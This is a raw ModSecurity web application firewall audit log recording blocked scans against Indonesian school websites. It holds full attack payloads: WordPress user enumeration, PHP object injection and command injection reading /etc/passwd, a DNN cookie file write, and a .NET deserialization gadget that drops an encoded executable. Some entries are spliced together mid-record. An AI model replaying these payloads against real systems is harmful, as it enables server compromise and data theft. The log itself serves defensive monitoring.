Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f570e3f-Z-- --6e187433-A-- [21/May/2025:02:08:59 +0700] aCzTS22BM6ll8T8hTXvlrgAAAFc 103.236.140.4 49620 103.236.140.4 8181 --6e187433-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.210.234.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.210.234.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6e187433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e187433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747768139151953 3261 (- - -) Stopwatch2: 1747768139151953 3261; combined=1384, p1=483, p2=871, p3=0, p4=0, p5=30, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e187433-Z-- --2e64721f-A-- [21/May/2025:02:17:24 +0700] aCzVRPjdRvl4szSJA_bFvQAAAIQ 103.236.140.4 49676 103.236.140.4 8181 --2e64721f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.6.41.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.6.41.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e64721f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e64721f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747768644409746 3182 (- - -) Stopwatch2: 1747768644409746 3182; combined=1420, p1=546, p2=843, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e64721f-Z-- --eaaba932-A-- [21/May/2025:02:50:45 +0700] aCzdFfjdRvl4szSJA_bFxwAAAIs 103.236.140.4 49850 103.236.140.4 8181 --eaaba932-B-- POST /scripts/setup.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 80 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168161607 --eaaba932-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --eaaba932-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaaba932-E-- --eaaba932-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747770645130437 2645 (- - -) Stopwatch2: 1747770645130437 2645; combined=755, p1=523, p2=184, p3=0, p4=0, p5=48, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaaba932-Z-- --1926ef75-A-- [21/May/2025:02:50:45 +0700] aCzdFW2BM6ll8T8hTXvlxwAAAFQ 103.236.140.4 49838 103.236.140.4 8181 --1926ef75-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 160557772 --1926ef75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1926ef75-E-- --1926ef75-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 157997070 --6a438731-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a438731-E-- --6a438731-H-- Message: Access denied with code 403 (phase 2). Pattern match " --f6f8f528-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6f8f528-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747793671809858 4794 (- - -) Stopwatch2: 1747793671809858 4794; combined=3424, p1=371, p2=2960, p3=23, p4=40, p5=30, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6f8f528-Z-- --d6ec8d33-A-- [21/May/2025:09:14:31 +0700] aC03B4v3pT1iV0OxjLTnLwAAAI4 103.236.140.4 40514 103.236.140.4 8181 --d6ec8d33-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788136 --d6ec8d33-C-- whatever-content --d6ec8d33-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6ec8d33-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747793671815076 4848 (- - -) Stopwatch2: 1747793671815076 4848; combined=3743, p1=352, p2=3318, p3=21, p4=23, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6ec8d33-Z-- --f12c7a61-A-- [21/May/2025:09:14:31 +0700] aC03B4v3pT1iV0OxjLTnMAAAAJE 103.236.140.4 40520 103.236.140.4 8181 --f12c7a61-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 167545241 --f12c7a61-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --f12c7a61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f12c7a61-E-- --f12c7a61-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793671825407 1693 (- - -) Stopwatch2: 1747793671825407 1693; combined=527, p1=344, p2=155, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f12c7a61-Z-- --7e617266-A-- [21/May/2025:09:14:31 +0700] aC03B3ZGSt58M5vv3glyhAAAABc 103.236.140.4 40522 103.236.140.4 8181 --7e617266-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788139 --7e617266-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --7e617266-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e617266-E-- --7e617266-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793671825795 13885 (- - -) Stopwatch2: 1747793671825795 13885; combined=12463, p1=364, p2=12071, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 